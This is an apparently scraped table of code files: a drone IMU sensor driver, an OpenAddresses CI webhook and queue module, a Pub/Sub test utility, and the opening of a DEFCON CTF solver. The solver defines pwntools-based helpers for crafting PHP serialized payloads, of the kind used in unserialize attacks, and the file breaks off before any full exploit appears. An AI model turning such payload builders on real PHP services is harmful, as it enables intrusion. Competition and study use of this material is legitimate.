| repo_name (stringlengths 5–92) | path (stringlengths 4–221) | copies (stringclasses 19 values) | size (stringlengths 4–6) | content (stringlengths 766–896k) | license (stringclasses 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| dpm76/eaglebone | drone/flight/stabilization/imu6050.py | 1 | 7844 |
# -*- coding: utf-8 -*-
'''
Created on 23/10/2015
@author: david
'''
import logging
import math
import time
import imu6050_defs as reg
from sensors.I2CSensor import I2CSensor
from sensors.vector import Vector
from copy import deepcopy
from flight.stabilization.state import SensorState
try:
import smbus
except ImportError:
class smbus(object):
@staticmethod
def SMBus(channel):
raise Exception("smbus module not found!")
class Imu6050(I2CSensor):
'''
Gyro and accelerometer
'''
ADDRESS = 0x68
GYRO2DEG = 250.0 / 32767.0 # +/- 250º/s mode
ACCEL2G = 2.0 / 32767.0 # +/- 2g mode
GRAVITY = 9.807 #m/s²
PI2 = math.pi / 2.0
ACCEL2MS2 = GRAVITY * ACCEL2G
#CALIBRATION_FILE_PATH = "../calibration.config.json"
def __init__(self):
'''
Constructor
'''
self._setAddress(Imu6050.ADDRESS)
self._bus = smbus.SMBus(1)
self._gyroOffset = [0]*3
self._gyroReadTime = time.time()
self._previousAngles = [0.0]*3
self._accOffset = [0]*3
self._accAnglesOffset = [0.0]*2
self._lastReadAccRawData = [0]*3
self._angSpeed = [0.0]*2
self._localGravity = 0.0
self._state = SensorState()
def _readRawGyroX(self):
return self._readWordHL(reg.GYRO_XOUT)
def _readRawGyroY(self):
return self._readWordHL(reg.GYRO_YOUT)
def _readRawGyroZ(self):
return self._readWordHL(reg.GYRO_ZOUT)
def _readAngSpeed(self, reg, index):
data = (self._readWordHL(reg) - self._gyroOffset[index]) * Imu6050.GYRO2DEG
return data
def readAngleSpeeds(self):
return self._state.angleSpeeds
def _readAngleSpeeds(self):
speedAX = self._readAngSpeedX()
speedAY = self._readAngSpeedY()
speedAZ = self._readAngSpeedZ()
self._state.angleSpeeds = [speedAX, speedAY, speedAZ]
def _readAngSpeedX(self):
return self._readAngSpeed(reg.GYRO_XOUT, 0)
def _readAngSpeedY(self):
return self._readAngSpeed(reg.GYRO_YOUT, 1)
def _readAngSpeedZ(self):
return self._readAngSpeed(reg.GYRO_ZOUT, 2)
def _readAccAngles(self):
rawAccX = self._readRawAccelX()
rawAccY = self._readRawAccelY()
rawAccZ = self._readRawAccelZ()
accAngX = math.degrees(math.atan2(rawAccY, rawAccZ))
accAngY = -math.degrees(math.atan2(rawAccX, rawAccZ))
accAngles = [accAngX, accAngY]
return accAngles
def readAngles(self):
return self._state.angles
def _readAngles(self):
accAngles = self._readAccAngles()
previousAngSpeeds = self._angSpeed
self._angSpeed = [self._state.angleSpeeds[0],self._state.angleSpeeds[1]] #[self._readAngSpeedX(), self._readAngSpeedY()]
currentTime = time.time()
dt2 = (currentTime - self._gyroReadTime) / 2.0
currentAngles = [0.0]*3
for index in range(2):
expectedAngle = self._previousAngles[index] + \
(self._angSpeed[index] + previousAngSpeeds[index]) * dt2
currentAngles[index] = 0.2 * accAngles[index] + 0.8 * expectedAngle
self._gyroReadTime = currentTime
self._previousAngles = currentAngles
self._state.angles = deepcopy(currentAngles)
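# The loop above is a simple complementary filter: each axis integrates the
# averaged gyro rate over dt (trapezoidal rule) to predict the angle, then
# blends that prediction with the accelerometer-derived angle using fixed
# weights (0.2 accelerometer / 0.8 gyro), limiting gyro drift while damping
# accelerometer noise.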
def readDeviceAngles(self):
angles = self.readAngles()
angles[0] -= self._accAnglesOffset[0]
angles[1] -= self._accAnglesOffset[1]
return angles
def _readRawAccel(self, reg):
return self._readWordHL(reg)
def _readRawAccelX(self):
return self._readRawAccel(reg.ACC_XOUT)
def _readRawAccelY(self):
return self._readRawAccel(reg.ACC_YOUT)
def _readRawAccelZ(self):
return self._readRawAccel(reg.ACC_ZOUT)
def readAccels(self):
return self._state.accels
def _readAccels(self):
accelX = self._readRawAccelX() * Imu6050.ACCEL2MS2
accelY = self._readRawAccelY() * Imu6050.ACCEL2MS2
accelZ = self._readRawAccelZ() * Imu6050.ACCEL2MS2
angles = [math.radians(angle) for angle in self.readAngles()]
accels = Vector.rotateVector3D([accelX, accelY, accelZ], angles + [0.0])
#Eliminate gravity acceleration
accels[2] -= self._localGravity
self._state.accels = accels
def readQuaternions(self):
#TODO
pass
def resetGyroReadTime(self):
self._gyroReadTime = time.time()
def refreshState(self):
self._readAngleSpeeds()
self._readAngles()
self._readAccels()
def start(self):
'''
Initializes sensor
'''
startMessage = "Using IMU-6050."
print startMessage
logging.info(startMessage)
#Initializes gyro
self._bus.write_byte_data(self._address, reg.PWR_MGM1, reg.RESET)
self._bus.write_byte_data(self._address, reg.PWR_MGM1, reg.CLK_SEL_X)
#1kHz (with DLPF_CFG_6) / (SMPLRT_DIV + 1) => sample rate @50Hz
self._bus.write_byte_data(self._address, reg.SMPRT_DIV, 19)
#DLPF_CFG_6: Low-pass filter @5Hz; analog sample rate @1kHz
self._bus.write_byte_data(self._address, reg.CONFIG, reg.DLPF_CFG_6)
self._bus.write_byte_data(self._address, reg.GYRO_CONFIG, reg.GFS_250)
self._bus.write_byte_data(self._address, reg.ACCEL_CONFIG, reg.AFS_2)
self._bus.write_byte_data(self._address, reg.PWR_MGM1, 0)
#TODO 20160202 DPM - Sample rate at least at 400Hz
#Wait for sensor stabilization
time.sleep(1)
self.calibrate()
def calibrate(self):
'''
Calibrates sensor
'''
print "Calibrating accelerometer..."
self._accOffset = [0.0]*3
i = 0
while i < 100:
self._accOffset[0] += self._readRawAccelX()
self._accOffset[1] += self._readRawAccelY()
self._accOffset[2] += self._readRawAccelZ()
time.sleep(0.02)
i+=1
for index in range(3):
self._accOffset[index] /= float(i)
#Calibrate gyro
print "Calibrating gyro..."
self._gyroOffset = [0.0]*3
i = 0
while i < 100:
self._gyroOffset[0] += self._readRawGyroX()
self._gyroOffset[1] += self._readRawGyroY()
self._gyroOffset[2] += self._readRawGyroZ()
time.sleep(0.02)
i += 1
for index in range(3):
self._gyroOffset[index] /= float(i)
#Calculate sensor installation angles
self._accAnglesOffset[0] = self._previousAngles[0] = math.degrees(math.atan2(self._accOffset[1], self._accOffset[2]))
self._accAnglesOffset[1] = self._previousAngles[1] = -math.degrees(math.atan2(self._accOffset[0], self._accOffset[2]))
#Calculate local gravity
angles = [math.radians(angle) for angle in self._accAnglesOffset]
accels = [accel * Imu6050.ACCEL2MS2 for accel in self._accOffset]
self._localGravity = Vector.rotateVector3D(accels, angles + [0.0])[2]
def getMaxErrorZ(self):
return 0.1
def stop(self):
pass
| isc | 3,956,320,715,344,091,600 | 23.974522 | 128 | 0.55394 | false | 3.459197 | false | false | false |

| slibby/machine | openaddr/ci/__init__.py | 1 | 28361 |
import logging; _L = logging.getLogger('openaddr.ci')
from ..compat import standard_library, expand_uri
from .. import jobs, render
from .objects import (
add_job, write_job, read_job, complete_set, update_set_renders,
add_run, set_run, copy_run, read_completed_set_runs,
get_completed_file_run, get_completed_run, new_read_completed_set_runs
)
from os.path import relpath, splitext, join, basename
from datetime import timedelta
from uuid import uuid4, getnode
from base64 import b64decode
from tempfile import mkdtemp
from shutil import rmtree
from time import sleep
import json, os
from flask import Flask, request, Response, current_app, jsonify, render_template
from requests import get, post
from dateutil.tz import tzutc
from psycopg2 import connect
from boto import connect_sns
from pq import PQ
# Ask Python 2 to get real unicode from the database.
# http://initd.org/psycopg/docs/usage.html#unicode-handling
import psycopg2.extensions
psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)
psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
def load_config():
def truthy(value):
return bool(value.lower() in ('yes', 'true'))
secrets_string = os.environ.get('WEBHOOK_SECRETS', u'').encode('utf8')
webhook_secrets = secrets_string.split(b',') if secrets_string else []
return dict(GAG_GITHUB_STATUS=truthy(os.environ.get('GAG_GITHUB_STATUS', '')),
GITHUB_AUTH=(os.environ['GITHUB_TOKEN'], 'x-oauth-basic'),
MEMCACHE_SERVER=os.environ.get('MEMCACHE_SERVER'),
DATABASE_URL=os.environ['DATABASE_URL'],
WEBHOOK_SECRETS=webhook_secrets)
MAGIC_OK_MESSAGE = 'Everything is fine'
TASK_QUEUE, DONE_QUEUE, DUE_QUEUE = 'tasks', 'finished', 'due'
# Additional delay after JOB_TIMEOUT for due tasks.
DUETASK_DELAY = timedelta(minutes=5)
# Amount of time to reuse run results.
RUN_REUSE_TIMEOUT = timedelta(days=5)
# Time to chill out in pop_task_from_taskqueue() after sending Done task.
WORKER_COOLDOWN = timedelta(seconds=5)
def td2str(td):
''' Convert a timedelta to a string formatted like '3h'.
Will not be necessary when https://github.com/malthe/pq/pull/5 is released.
'''
return '{}s'.format(td.seconds + td.days * 86400)
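# For example, td2str(timedelta(hours=3)) returns '10800s' and
# td2str(timedelta(days=1, seconds=30)) returns '86430s'.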
def get_touched_payload_files(payload):
''' Return a set of files modified in payload commits.
'''
touched = set()
# Iterate over commits in chronological order.
for commit in payload['commits']:
for filelist in (commit['added'], commit['modified']):
# Include any potentially-new files.
touched.update(filelist)
for filename in commit['removed']:
# Skip files that no longer exist.
if filename in touched:
touched.remove(filename)
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
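# Illustrative push-event fragment (field names follow the GitHub push
# webhook schema; the source paths are made up):
#   {'commits': [{'added': ['sources/us/ca.json'],
#                 'modified': ['sources/de/berlin.json'],
#                 'removed': []}]}
# would yield touched == {'sources/us/ca.json', 'sources/de/berlin.json'}.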
def get_touched_branch_files(payload, github_auth):
''' Return a set of files modified between master and payload head.
'''
branch_sha = payload['head_commit']['id']
compare1_url = payload['repository']['compare_url']
compare1_url = expand_uri(compare1_url, dict(base='master', head=branch_sha))
current_app.logger.debug('Compare URL 1 {}'.format(compare1_url))
compare1 = get(compare1_url, auth=github_auth).json()
merge_base_sha = compare1['merge_base_commit']['sha']
# That's no branch.
if merge_base_sha == branch_sha:
return set()
compare2_url = payload['repository']['compare_url']
compare2_url = expand_uri(compare2_url, dict(base=merge_base_sha, head=branch_sha))
current_app.logger.debug('Compare URL 2 {}'.format(compare2_url))
compare2 = get(compare2_url, auth=github_auth).json()
touched = set([file['filename'] for file in compare2['files']])
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
def get_touched_pullrequest_files(payload, github_auth):
''' Return a set of files modified between master and payload head.
'''
if payload['action'] == 'closed':
return set()
base_sha = payload['pull_request']['base']['sha']
head_sha = payload['pull_request']['head']['sha']
compare_url = payload['pull_request']['head']['repo']['compare_url']
compare_url = expand_uri(compare_url, dict(head=head_sha, base=base_sha))
current_app.logger.debug('Compare URL {}'.format(compare_url))
compare = get(compare_url, auth=github_auth).json()
touched = set([file['filename'] for file in compare['files']])
current_app.logger.debug(u'Touched files {}'.format(', '.join(touched)))
return touched
def skip_payload(payload):
''' Return True if this payload should not be processed.
'''
if 'action' in payload and 'pull_request' in payload:
return bool(payload['action'] == 'closed')
if 'commits' in payload and 'head_commit' in payload:
# Deleted refs will not have a status URL.
return bool(payload.get('deleted') == True)
return True
def process_payload_files(payload, github_auth):
''' Return a dictionary of file paths to raw JSON contents and file IDs.
'''
if 'action' in payload and 'pull_request' in payload:
return process_pullrequest_payload_files(payload, github_auth)
if 'commits' in payload and 'head_commit' in payload:
return process_pushevent_payload_files(payload, github_auth)
raise ValueError('Unintelligible webhook payload')
def process_pullrequest_payload_files(payload, github_auth):
''' Return a dictionary of files paths from a pull request event payload.
https://developer.github.com/v3/activity/events/types/#pullrequestevent
'''
files = dict()
touched = get_touched_pullrequest_files(payload, github_auth)
commit_sha = payload['pull_request']['head']['sha']
for filename in touched:
if relpath(filename, 'sources').startswith('..'):
# Skip things outside of sources directory.
continue
if splitext(filename)[1] != '.json':
# Skip non-JSON files.
continue
contents_url = payload['pull_request']['head']['repo']['contents_url'] + '{?ref}'
contents_url = expand_uri(contents_url, dict(path=filename, ref=commit_sha))
current_app.logger.debug('Contents URL {}'.format(contents_url))
got = get(contents_url, auth=github_auth)
contents = got.json()
if got.status_code not in range(200, 299):
current_app.logger.warning('Skipping {} - {}'.format(filename, got.status_code))
continue
if contents['encoding'] != 'base64':
raise ValueError('Unrecognized encoding "{encoding}"'.format(**contents))
current_app.logger.debug('Contents SHA {sha}'.format(**contents))
files[filename] = contents['content'], contents['sha']
return files
def process_pushevent_payload_files(payload, github_auth):
''' Return a dictionary of files paths from a push event payload.
https://developer.github.com/v3/activity/events/types/#pushevent
'''
files = dict()
touched = get_touched_payload_files(payload)
touched |= get_touched_branch_files(payload, github_auth)
commit_sha = payload['head_commit']['id']
for filename in touched:
if relpath(filename, 'sources').startswith('..'):
# Skip things outside of sources directory.
continue
if splitext(filename)[1] != '.json':
# Skip non-JSON files.
continue
contents_url = payload['repository']['contents_url'] + '{?ref}'
contents_url = expand_uri(contents_url, dict(path=filename, ref=commit_sha))
current_app.logger.debug('Contents URL {}'.format(contents_url))
got = get(contents_url, auth=github_auth)
contents = got.json()
if got.status_code not in range(200, 299):
current_app.logger.warning('Skipping {} - {}'.format(filename, got.status_code))
continue
if contents['encoding'] != 'base64':
raise ValueError('Unrecognized encoding "{encoding}"'.format(**contents))
current_app.logger.debug('Contents SHA {sha}'.format(**contents))
files[filename] = contents['content'], contents['sha']
return files
def get_commit_info(payload):
''' Get commit SHA and Github status API URL from webhook payload.
'''
if 'pull_request' in payload:
commit_sha = payload['pull_request']['head']['sha']
status_url = payload['pull_request']['statuses_url']
elif 'head_commit' in payload:
commit_sha = payload['head_commit']['id']
status_url = payload['repository']['statuses_url']
status_url = expand_uri(status_url, dict(sha=commit_sha))
else:
raise ValueError('Unintelligible payload')
current_app.logger.debug('Status URL {}'.format(status_url))
return commit_sha, status_url
def post_github_status(status_url, status_json, github_auth):
''' POST status JSON to Github status API.
'''
if status_url is None:
return
# Github only wants 140 chars of description.
status_json['description'] = status_json['description'][:140]
posted = post(status_url, data=json.dumps(status_json), auth=github_auth,
headers={'Content-Type': 'application/json'})
if posted.status_code not in range(200, 299):
raise ValueError('Failed status post to {}'.format(status_url))
if posted.json()['state'] != status_json['state']:
raise ValueError('Mismatched status post to {}'.format(status_url))
def update_pending_status(status_url, job_url, filenames, github_auth):
''' Push pending status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='pending',
description=u'Checking {}'.format(', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def update_error_status(status_url, message, filenames, github_auth):
''' Push error status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='error',
description=u'Errored on {}: {}'.format(', '.join(filenames), message))
return post_github_status(status_url, status, github_auth)
def update_failing_status(status_url, job_url, bad_files, filenames, github_auth):
''' Push failing status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='failure',
description=u'Failed on {} from {}'.format(', '.join(bad_files), ', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def update_empty_status(status_url, github_auth):
''' Push success status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='success',
description='Nothing to check')
return post_github_status(status_url, status, github_auth)
def update_success_status(status_url, job_url, filenames, github_auth):
''' Push success status for head commit to Github status API.
'''
status = dict(context='openaddresses/hooked', state='success',
description=u'Succeeded on {}'.format(', '.join(filenames)),
target_url=job_url)
return post_github_status(status_url, status, github_auth)
def find_batch_sources(owner, repository, github_auth):
''' Starting with a Github repo API URL, generate a stream of master sources.
'''
resp = get('https://api.github.com/', auth=github_auth)
if resp.status_code >= 400:
raise Exception('Got status {} from Github API'.format(resp.status_code))
start_url = expand_uri(resp.json()['repository_url'], dict(owner=owner, repo=repository))
_L.info('Starting batch sources at {start_url}'.format(**locals()))
got = get(start_url, auth=github_auth).json()
contents_url, commits_url = got['contents_url'], got['commits_url']
master_url = expand_uri(commits_url, dict(sha=got['default_branch']))
_L.debug('Getting {ref} branch {master_url}'.format(ref=got['default_branch'], **locals()))
got = get(master_url, auth=github_auth).json()
commit_sha, commit_date = got['sha'], got['commit']['committer']['date']
contents_url += '{?ref}' # So that we are consistently at the same commit.
sources_urls = [expand_uri(contents_url, dict(path='sources', ref=commit_sha))]
sources_dict = dict()
for sources_url in sources_urls:
_L.debug('Getting sources {sources_url}'.format(**locals()))
sources = get(sources_url, auth=github_auth).json()
for source in sources:
if source['type'] == 'dir':
params = dict(path=source['path'], ref=commit_sha)
sources_urls.append(expand_uri(contents_url, params))
continue
if source['type'] != 'file':
continue
path_base, ext = splitext(source['path'])
if ext == '.json':
_L.debug('Getting source {url}'.format(**source))
more_source = get(source['url'], auth=github_auth).json()
yield dict(commit_sha=commit_sha, url=source['url'],
blob_sha=source['sha'], path=source['path'],
content=more_source['content'])
def enqueue_sources(queue, the_set, sources):
''' Batch task generator, yields counts of remaining expected paths.
'''
expected_paths = set()
commit_sha = None
#
# Enqueue each source if there is nothing else in the queue.
#
for source in sources:
while len(queue) >= 1:
yield len(expected_paths)
with queue as db:
_L.info(u'Sending {path} to task queue'.format(**source))
task_data = dict(job_id=None, url=None, set_id=the_set.id,
name=source['path'],
content_b64=source['content'],
commit_sha=source['commit_sha'],
file_id=source['blob_sha'])
task_id = queue.put(task_data)
expected_paths.add(source['path'])
commit_sha = source['commit_sha']
while len(expected_paths):
with queue as db:
_update_expected_paths(db, expected_paths, the_set)
yield len(expected_paths)
with queue as db:
complete_set(db, the_set.id, commit_sha)
yield 0
def _update_expected_paths(db, expected_paths, the_set):
''' Discard sources from expected_paths set as they appear in runs table.
'''
for (_, source_path, _, _) in read_completed_set_runs(db, the_set.id):
_L.debug(u'Discarding {}'.format(source_path))
expected_paths.discard(source_path)
def render_index_maps(s3, runs):
''' Render index maps and upload them to S3.
'''
dirname = mkdtemp(prefix='index-maps-')
try:
good_runs = [run for run in runs if (run.state or {}).get('processed')]
good_sources = _prepare_render_sources(good_runs, dirname)
_render_and_upload_maps(s3, good_sources, '/', dirname)
finally:
rmtree(dirname)
def render_set_maps(s3, db, the_set):
''' Render set maps, upload them to S3 and add to the database.
'''
dirname = mkdtemp(prefix='set-maps-')
try:
s3_prefix = join('/sets', str(the_set.id))
runs = new_read_completed_set_runs(db, the_set.id)
good_sources = _prepare_render_sources(runs, dirname)
s3_urls = _render_and_upload_maps(s3, good_sources, s3_prefix, dirname)
update_set_renders(db, the_set.id, *s3_urls)
finally:
rmtree(dirname)
def _render_and_upload_maps(s3, good_sources, s3_prefix, dirname):
''' Render set maps, upload them to S3 and return their URLs.
'''
urls = dict()
areas = (render.WORLD, 'world'), (render.USA, 'usa'), (render.EUROPE, 'europe')
key_kwargs = dict(policy='public-read', headers={'Content-Type': 'image/png'})
url_kwargs = dict(expires_in=0, query_auth=False, force_http=True)
for (area, area_name) in areas:
png_basename = 'render-{}.png'.format(area_name)
png_filename = join(dirname, png_basename)
render.render(dirname, good_sources, 960, 2, png_filename, area)
with open(png_filename, 'rb') as file:
render_path = 'render-{}.png'.format(area_name)
render_key = s3.new_key(join(s3_prefix, png_basename))
render_key.set_contents_from_string(file.read(), **key_kwargs)
urls[area_name] = render_key.generate_url(**url_kwargs)
return urls['world'], urls['usa'], urls['europe']
def _prepare_render_sources(runs, dirname):
''' Dump all non-null set runs into a directory for rendering.
'''
good_sources = set()
for run in runs:
filename = '{source_id}.json'.format(**run.__dict__)
with open(join(dirname, filename), 'w+b') as file:
content = b64decode(run.source_data)
file.write(content)
if run.status is True:
good_sources.add(filename)
return good_sources
def calculate_job_id(files):
'''
'''
return str(uuid4())
#
# Previously, we created a deterministic hash of
# the files, but for now that might be too optimistic.
#
blob = json.dumps(files, ensure_ascii=True, sort_keys=True)
job_id = sha1(blob).hexdigest()
return job_id
def create_queued_job(queue, files, job_url_template, commit_sha, status_url):
''' Create a new job, and add its files to the queue.
'''
filenames = list(files.keys())
file_states = {name: None for name in filenames}
file_results = {name: None for name in filenames}
job_id = calculate_job_id(files)
job_url = job_url_template and expand_uri(job_url_template, dict(id=job_id))
job_status = None
with queue as db:
task_files = add_files_to_queue(queue, job_id, job_url, files, commit_sha)
add_job(db, job_id, None, task_files, file_states, file_results, status_url)
return job_id
def add_files_to_queue(queue, job_id, job_url, files, commit_sha):
''' Make a new task for each file, return dict of file IDs to file names.
'''
tasks = {}
for (file_name, (content_b64, file_id)) in files.items():
task_data = dict(job_id=job_id, url=job_url, name=file_name,
content_b64=content_b64, file_id=file_id,
commit_sha=commit_sha)
# Spread tasks out over time.
delay = timedelta(seconds=len(tasks))
queue.put(task_data, expected_at=td2str(delay))
tasks[file_id] = file_name
return tasks
def is_completed_run(db, run_id, min_datetime):
'''
'''
if min_datetime.tzinfo:
# Convert known time zones to UTC.
min_dtz = min_datetime.astimezone(tzutc())
else:
# Assume unspecified time zones are UTC.
min_dtz = min_datetime.replace(tzinfo=tzutc())
completed_run = get_completed_run(db, run_id, min_dtz)
if completed_run:
_L.debug('Found completed run {0} ({1}) since {min_datetime}'.format(*completed_run, **locals()))
else:
_L.debug('No completed run {run_id} since {min_datetime}'.format(**locals()))
return bool(completed_run is not None)
def update_job_status(db, job_id, job_url, filename, run_status, results, github_auth):
'''
'''
try:
job = read_job(db, job_id)
except TypeError:
raise Exception('Job {} not found'.format(job_id))
if filename not in job.states:
raise Exception('Unknown file from job {}: "{}"'.format(job.id, filename))
filenames = list(job.task_files.values())
job.states[filename] = run_status
job.file_results[filename] = results
# Update job status.
if False in job.states.values():
# Any task failure means the whole job has failed.
job.status = False
elif None in job.states.values():
job.status = None
else:
job.status = True
write_job(db, job.id, job.status, job.task_files, job.states, job.file_results, job.github_status_url)
if not job.github_status_url:
_L.warning('No status_url to tell about {} status of job {}'.format(job.status, job.id))
return
if job.status is False:
bad_files = [name for (name, state) in job.states.items() if state is False]
update_failing_status(job.github_status_url, job_url, bad_files, filenames, github_auth)
elif job.status is None:
update_pending_status(job.github_status_url, job_url, filenames, github_auth)
elif job.status is True:
update_success_status(job.github_status_url, job_url, filenames, github_auth)
def pop_task_from_taskqueue(s3, task_queue, done_queue, due_queue, output_dir):
'''
'''
with task_queue as db:
task = task_queue.get()
# PQ will return None after a 1 second timeout if no task is available
if task is None:
return
_L.info(u'Got file {name} from task queue'.format(**task.data))
passed_on_keys = 'job_id', 'file_id', 'name', 'url', 'content_b64', 'commit_sha', 'set_id'
passed_on_kwargs = {k: task.data.get(k) for k in passed_on_keys}
passed_on_kwargs['worker_id'] = hex(getnode()).rstrip('L')
interval = '{} seconds'.format(RUN_REUSE_TIMEOUT.seconds + RUN_REUSE_TIMEOUT.days * 86400)
previous_run = get_completed_file_run(db, task.data.get('file_id'), interval)
if previous_run:
# Make a copy of the previous run.
previous_run_id, _, _ = previous_run
copy_args = (passed_on_kwargs[k] for k in ('job_id', 'commit_sha', 'set_id'))
passed_on_kwargs['run_id'] = copy_run(db, previous_run_id, *copy_args)
# Don't send a due task, since we will not be doing any actual work.
else:
# Reserve space for a new run.
passed_on_kwargs['run_id'] = add_run(db)
# Send a Due task, possibly for later.
due_task_data = dict(task_data=task.data, **passed_on_kwargs)
due_queue.put(due_task_data, schedule_at=td2str(jobs.JOB_TIMEOUT + DUETASK_DELAY))
if previous_run:
# Re-use result from the previous run.
run_id, state, status = previous_run
message = MAGIC_OK_MESSAGE if status else 'Re-using failed previous run'
result = dict(message=message, reused_run=run_id, output=state)
else:
# Run the task.
from . import worker # <-- TODO: un-suck this.
source_name, _ = splitext(relpath(passed_on_kwargs['name'], 'sources'))
result = worker.do_work(s3, passed_on_kwargs['run_id'], source_name,
passed_on_kwargs['content_b64'], output_dir)
# Send a Done task
done_task_data = dict(result=result, **passed_on_kwargs)
done_queue.put(done_task_data, expected_at=td2str(timedelta(0)))
_L.info('Done')
# Sleep a short time to allow done task to show up in runs table.
# In a one-worker situation with repetitive pull request jobs,
# this helps the next job take advantage of previous run results.
sleep(WORKER_COOLDOWN.seconds + WORKER_COOLDOWN.days * 86400)
def pop_task_from_donequeue(queue, github_auth):
''' Look for a completed job in the "done" task queue, update Github status.
'''
with queue as db:
task = queue.get()
if task is None:
return
_L.info(u'Got file {name} from done queue'.format(**task.data))
results = task.data['result']
message = results['message']
run_state = results.get('output', None)
content_b64 = task.data['content_b64']
commit_sha = task.data['commit_sha']
worker_id = task.data.get('worker_id')
set_id = task.data.get('set_id')
job_url = task.data['url']
filename = task.data['name']
file_id = task.data['file_id']
run_id = task.data['run_id']
job_id = task.data['job_id']
if is_completed_run(db, run_id, task.enqueued_at):
# We are too late, this got handled.
return
run_status = bool(message == MAGIC_OK_MESSAGE)
set_run(db, run_id, filename, file_id, content_b64, run_state,
run_status, job_id, worker_id, commit_sha, set_id)
if job_id:
update_job_status(db, job_id, job_url, filename, run_status, results, github_auth)
def pop_task_from_duequeue(queue, github_auth):
'''
'''
with queue as db:
task = queue.get()
if task is None:
return
_L.info(u'Got file {name} from due queue'.format(**task.data))
original_task = task.data['task_data']
content_b64 = task.data['content_b64']
commit_sha = task.data['commit_sha']
worker_id = task.data.get('worker_id')
set_id = task.data.get('set_id')
job_url = task.data['url']
filename = task.data['name']
file_id = task.data['file_id']
run_id = task.data['run_id']
job_id = task.data['job_id']
if is_completed_run(db, run_id, task.enqueued_at):
# Everything's fine, this got handled.
return
run_status = False
set_run(db, run_id, filename, file_id, content_b64, None, run_status,
job_id, worker_id, commit_sha, set_id)
if job_id:
update_job_status(db, job_id, job_url, filename, run_status, False, github_auth)
def db_connect(dsn=None, user=None, password=None, host=None, database=None, sslmode=None):
''' Connect to database.
Use DSN string if given, but allow other calls for older systems.
'''
if dsn is None:
return connect(user=user, password=password, host=host, database=database, sslmode=sslmode)
return connect(dsn)
def db_queue(conn, name):
return PQ(conn, table='queue')[name]
def db_cursor(conn):
return conn.cursor()
class SnsHandler(logging.Handler):
''' Logs to the given Amazon SNS topic; meant for errors.
'''
def __init__(self, arn, *args, **kwargs):
super(SnsHandler, self).__init__(*args, **kwargs)
# Rely on boto AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY variables.
self.arn, self.sns = arn, connect_sns()
def emit(self, record):
subject = u'OpenAddr: {}: {}'.format(record.levelname, record.name)
if hasattr(record, 'request_info'):
subject = '{} - {}'.format(subject, record.request_info)
self.sns.publish(self.arn, self.format(record), subject[:79])
def setup_logger(sns_arn, log_level=logging.DEBUG):
''' Set up logging for openaddr code.
'''
# Get a handle for the openaddr logger and its children
openaddr_logger = logging.getLogger('openaddr')
# Default logging format.
log_format = '%(asctime)s %(levelname)07s: %(message)s'
# Set the logger level to show everything, and filter down in the handlers.
openaddr_logger.setLevel(log_level)
# Set up a logger to stderr
handler1 = logging.StreamHandler()
handler1.setLevel(log_level)
handler1.setFormatter(logging.Formatter(log_format))
openaddr_logger.addHandler(handler1)
# Set up a second logger to SNS
try:
handler2 = SnsHandler(sns_arn)
except:
openaddr_logger.warning('Failed to authenticate SNS handler')
else:
handler2.setLevel(logging.ERROR)
handler2.setFormatter(logging.Formatter(log_format))
openaddr_logger.addHandler(handler2)
if __name__ == '__main__':
app.run(debug=True)
| isc | -8,725,184,806,641,569,000 | 36.464993 | 106 | 0.618138 | false | 3.714604 | false | false | false |

| GoogleCloudPlatform/healthcare | imaging/ml/toolkit/hcls_imaging_ml_toolkit/test_pubsub_util.py | 1 | 1730 |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility class for tests using Pub/Sub-related functionality."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from typing import Dict, Optional, Text
from google.cloud import pubsub_v1
class PubsubRunLoopExitError(BaseException):
"""Forces exit from the infinite PubsubListener run loop.
PubsubListener catches all exceptions inheriting from Exception within its
Run loop. Use this exception within tests to force exit.
"""
pass
def CreatePubsubReceivedMessage(
ack_id: Text,
data: Text,
message_id: Text,
attributes: Optional[Dict[Text, Text]] = None
) -> pubsub_v1.types.ReceivedMessage:
"""Creates a ReceivedMessage instance for testing.
Args:
ack_id: Pubsub ACK ID.
data: The payload of the Pubsub message.
message_id: Pubsub Message ID
attributes: Pubsub attributes.
Returns:
Instance of ReceivedMessage.
"""
return pubsub_v1.types.ReceivedMessage(
ack_id=ack_id,
message=pubsub_v1.types.PubsubMessage(
data=data.encode('utf8'),
message_id=message_id,
attributes=attributes))
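# Example usage in a test (the ack_id, data and message_id values below are
# arbitrary placeholders):
#   msg = CreatePubsubReceivedMessage(
#       ack_id='ack-1', data='projects/p/dicomStores/s', message_id='42',
#       attributes={'eventType': 'test'})
#   assert msg.message.data == b'projects/p/dicomStores/s'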
| apache-2.0 | 4,498,637,888,027,374,600 | 30.454545 | 76 | 0.731792 | false | 3.931818 | false | false | false |

| Qwaz/solved-hacking-problem | DEFCON/2019 Finals/babi/solver.py | 1 | 1302 |
from base64 import b64encode
from pwn import *
def s_array(*args):
assert len(args) % 2 == 0
return 'a:%d:{' % (len(args) // 2) + ''.join(args) + '}'
def s_bool(val):
return 'b:%d;' % val
def s_str(s):
return 's:%d:"%s";' % (len(s), s)
def s_ref(val):
return 'r:%d;' % val
def s_int(val):
return 'i:%d;' % val
def s_float(val):
return 'd:%f;' % val
def s_null():
return 'N;'
